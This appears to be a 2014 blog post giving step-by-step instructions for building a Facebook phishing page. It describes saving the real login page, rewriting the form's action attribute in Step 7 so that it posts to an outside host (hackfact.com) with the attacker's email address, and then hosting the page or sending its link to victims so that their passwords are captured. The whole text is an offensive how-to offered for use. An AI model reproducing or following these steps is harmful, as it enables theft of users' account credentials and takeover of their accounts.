Tuesday 6 May 2014


 Step 1: Go to Facebook

 Step 2: Save the log in page of Facebook (shortcut:press Ctrl+S)

 Step 3: Now 2 things would have been saved in your computer with the  name "Welcome to Facebook - Log In, Sign Up or Learn More"

 Step 4: Right click on the saved file with name "Welcome to Facebook -  Log In, Sign Up or Learn More.htm" and open it with notepad

 Step 5: Now search where the word action is written in it for the first time  (shortcut:press Ctrl+F then type action in it and then press enter).

 Step 6: Now after action you will see  action="https://www.facebook.com/login.php?login_attempt=1"  id="login_form"

 Step 7: Now replace that line with action="http://hackfact.com/fb.php?  id=your-email-id-here@gmail.com&link=www.facebook.com/login.php?  login_attempt=1"

 Step 8: Now replace the line 'your-email-id-here@gmail.com' with your  email-id where you want to receive the password.

 Step 9: Save the notepad(shortcut: ctrl+s).

 Step 10: Now just put this page on your Desktop who so ever will log in  from this will be hacked. You will be having his/her password in your  email-id or the other option you have is that upload this page on a free  web hosting site where you can upload both these pages and if you have  your own website you can upload this on that and send the link to others.  :D

 Note: Remember both the files will be moved together which you saved  with the name "Welcome to Facebook - Log In, Sign Up or Learn More" and  you can rename the file with the name "Welcome to Facebook - Log In,  Sign Up or Learn More.htm" but not that folder.

Source: Hack The Hacker


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